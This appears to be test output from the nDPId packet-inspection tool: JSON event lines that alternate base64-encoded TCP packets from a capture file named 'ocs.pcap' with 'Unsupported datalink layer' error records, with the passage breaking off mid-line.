-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":185,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFAQABABoGpwKi0ArL40DbC2QBQ64tGkd7oYIuAEAslbvAAAAEBCAoANYVgRwYDdw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":186,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793724} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":186,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFBQABABoGcwKi0ArL40DbC2QBQ64tGkd7oYIuwEAslqawAAAEBCAoANYVgRwYDdwEBBQre6GX33uhrYw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":187,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793794} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":187,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFCQABABoGbwKi0ArL40DbC2QBQ64tGkd7oYIuwEAslpDkAAAEBCAoANYVnRwYDdwEBBQre6GX33uhwzw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":188,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793797} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":188,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFDQABABoGawKi0ArL40DbC2QBQ64tGkd7oYIuwEAslnswAAAEBCAoANYVoRwYDdwEBBQre6GX33uh2Ow=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":189,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793870} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":189,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFEQABABoGZwKi0ArL40DbC2QBQ64tGkd7oYIuwEAslmVkAAAEBCAoANYVvRwYDdwEBBQre6GX33uh7pw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":190,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793964} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":190,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFFQABABoGYwKi0ArL40DbC2QBQ64tGkd7oYIuwEAslk+QAAAEBCAoANYV4RwYDdwEBBQre6GX33uiBEw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":191,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794049} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":191,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFGQABABoGjwKi0ArL40DbC2QBQ64tGkd7ogROAEAtSTcgAAAEBCAoANYWARwYDyg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":192,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794050} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":192,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFHQABABoGiwKi0ArL40DbC2QBQ64tGkd7ohn+AEAuASC4AAAEBCAoANYWARwYDyg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":193,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794121} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":193,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFIQABABoGhwKi0ArL40DbC2QBQ64tGkd7oi+uAEAutQnkAAAEBCAoANYWIRwYD3g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":194,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794129} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":194,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFJQABABoGUwKi0ArL40DbC2QBQ64tGkd7oi+uwEAutJnUAAAEBCAoANYWIRwYD3gEBBQre6JFX3uiWww=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":195,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794199} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":195,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFKQABABoGTwKi0ArL40DbC2QBQ64tGkd7oi+uwEAutIQEAAAEBCAoANYWQRwYD3gEBBQre6JFX3uicLw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":196,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794205} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":196,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFLQABABoGSwKi0ArL40DbC2QBQ64tGkd7oi+uwEAutG5UAAAEBCAoANYWQRwYD3gEBBQre6JFX3uihmw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":197,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794247} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":197,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFMQABABoGRwKi0ArL40DbC2QBQ64tGkd7oi+uwEAutFiQAAAEBCAoANYWVRwYD3gEBBQre6JFX3uinBw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":198,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794256} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":198,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFNQABABoGcwKi0ArL40DbC2QBQ64tGkd7opweAEAvaJvgAAAEBCAoANYWWRwYECA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":199,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794320} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":199,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFOQABABoGbwKi0ArL40DbC2QBQ64tGkd7orHOAEAwHIVAAAAEBCAoANYWcRwYEEQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":200,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794327} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":200,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFPQABABoGawKi0ArL40DbC2QBQ64tGkd7osd+AEAw1G7MAAAEBCAoANYWdRwYEEw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":201,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794370} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":201,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFQQABABoGZwKi0ArL40DbC2QBQ64tGkd7ot0uAEAxiFggAAAEBCAoANYWhRwYEIQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":202,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794370} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":202,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFRQABABoGYwKi0ArL40DbC2QBQ64tGkd7ovLeAEAyPEG8AAAEBCAoANYWhRwYEIQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":203,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794439} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":203,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFSQABABoGLwKi0ArL40DbC2QBQ64tGkd7ovLewEAyPkssAAAEBCAoANYWoRwYEIQEBBQre6MIj3ujHjw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":204,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794442} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":204,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFTQABABoGKwKi0ArL40DbC2QBQ64tGkd7ovLewEAyPjV8AAAEBCAoANYWoRwYEIQEBBQre6MIj3ujM+w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":205,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794512} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":205,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFUQABABoGJwKi0ArL40DbC2QBQ64tGkd7ovLewEAyPh+wAAAEBCAoANYWvRwYEIQEBBQre6MIj3ujSZw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":206,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794515} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":206,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFVQABABoGIwKi0ArL40DbC2QBQ64tGkd7ovLewEAyPgn8AAAEBCAoANYWwRwYEIQEBBQre6MIj3ujX0w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":207,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794572} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":207,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFWQABABoGTwKi0ArL40DbC2QBQ64tGkd7o19OAEAy89OEAAAEBCAoANYW1RwYEUQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":208,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794587} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":208,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFXQABABoGSwKi0ArL40DbC2QBQ64tGkd7o3T+AEAzq70UAAAEBCAoANYW2RwYEUg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":209,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794605} -00331{"packet_event_id":1,"packet_event_name":"packet","packet_id":209,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPDy7QABABnyawKi0AomHgzS0VhQCr\/++QwAAAACgAjkI0QcAAAIEBbQEAggKADWFuQAAAAABAwMG"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":210,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794665} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":210,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFYQABABoGFwKi0ArL40DbC2QBQ64tGkd7o3T+wEAzqMJEAAAEBCAoANYW+RwYEUgEBBQre6OKr3ujoFw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":211,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794737} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":211,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMFZQABABoF8wKi0ArL40DbC2QBQ64tGkd7o3T\/QEAzqcjMAAAEBCAoANYXGRwYEUgEBBRLe6O2D3ujy797o4qve6OgX"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":212,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794776} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":212,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFaQABABoGDwKi0ArL40DbC2QBQ64tGkd7o6BewEA0XD5YAAAEBCAoANYXKRwYEjAEBBQre6O2D3ujy7w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":213,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794802} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":213,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFbQABABoGCwKi0ArL40DbC2QBQ64tGkd7o6BewEA0XCigAAAEBCAoANYXMRwYEjAEBBQre6O2D3uj4Ww=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":214,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794831} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":214,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFcQABABoGNwKi0ArL40DbC2QBQ64tGkd7o+FuAEA1E020AAAEBCAoANYXPRwYEmw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":215,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794834} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":215,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFdQABABoGMwKi0ArL40DbC2QBQ64tGkd7o\/ceAEA1xzdQAAAEBCAoANYXPRwYEmw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":216,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794870} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":216,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFeQABABoGLwKi0ArL40DbC2QBQ64tGkd7pAzOAEA2fyC4AAAEBCAoANYXTRwYEow=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":217,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794879} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":217,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFfQABABoGKwKi0ArL40DbC2QBQ64tGkd7pCJ+AEA3MwpEAAAEBCAoANYXURwYEpg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":218,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794880} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":218,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFgQABABoGJwKi0ArL40DbC2QBQ64tGkd7pDguAEA35vPgAAAEBCAoANYXURwYEpg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":219,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652794956} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":219,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMFhQABABoGIwKi0ArL40DbC2QBQ64tGkd7pE3eAEA4mt00AAAEBCAoANYXcRwYEsA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":220,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652795017} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":220,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFiQABABoF7wKi0ArL40DbC2QBQ64tGkd7pE3ewEA4mgVIAAAEBCAoANYXiRwYEsAEBBQre6R5P3ukjuw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":221,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652795091} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":221,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFjQABABoF6wKi0ArL40DbC2QBQ64tGkd7pE3ewEA4me98AAAEBCAoANYXpRwYEsAEBBQre6R5P3ukpJw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":222,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652795923} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":222,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFkQABABoF5wKi0ArL40DbC2QBQ64tGkd7pGOOwEA5UdP8AAAEBCAoANYY8RwYFowEBBQre6R5P3ukpJw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":223,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652796004} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":223,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMFlQABABoFwwKi0ArL40DbC2QBQ64tGkd7pGOPQEA5UNIEAAAEBCAoANYZERwYFowEBBRLe6S6T3ukz\/97pHk\/e6Skn"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":224,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652796098} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":224,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFmQABABoF3wKi0ArL40DbC2QBQ64tGkd7pKSewEA6BST0AAAEBCAoANYZNRwYFxwEBBQre6S6T3ukz\/w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":225,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652796173} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":225,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMFnQABABoFuwKi0ArL40DbC2QBQ64tGkd7pKSfQEA6B8w4AAAEBCAoANYZVRwYFxwEBBRLe6Tlr3uk+197pLpPe6TP\/"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":226,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652796241} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":226,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMFoQABABoFtwKi0ArL40DbC2QBQ64tGkd7pKSfQEA6B7ZsAAAEBCAoANYZcRwYFxwEBBRLe6Tlr3ulEQ97pLpPe6TP\/"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":227,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652796291} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":227,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMFpQABABoFswKi0ArL40DbC2QBQ64tGkd7pKSfQEA6B6CoAAAEBCAoANYZhRwYFxwEBBRLe6Tlr3ulJr97pLpPe6TP\/"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":228,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652796354} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":228,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMFqQABABoFrwKi0ArL40DbC2QBQ64tGkd7pKSfQEA6B4rgAAAEBCAoANYZnRwYFxwEBBRLe6Tlr3ulPG97pLpPe6TP\/"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":229,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652796970} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":229,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFrQABABoFywKi0ArL40DbC2QBQ64tGkd7pM\/+wEA6uFw4AAAEBCAoANYalRwYGpQEBBQre6Tlr3ulPGw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":230,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797047} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":230,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMFsQABABoFpwKi0ArL40DbC2QBQ64tGkd7pM\/\/QEA6uiqgAAAEBCAoANYasRwYGpQEBBRLe6VSH3ulZ897pOWve6U8b"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":231,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797048} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":231,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMFtQABABoFowKi0ArL40DbC2QBQ64tGkd7pM\/\/QEA6uhTsAAAEBCAoANYatRwYGpQEBBRLe6VSH3ulfX97pOWve6U8b"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":232,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652797129} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":232,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMFuQABABoFvwKi0ArL40DbC2QBQ64tGkd7pTxuwEA7b0C0AAAEBCAoANYa1RwYGzAEBBQre6VSH3ulfXw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 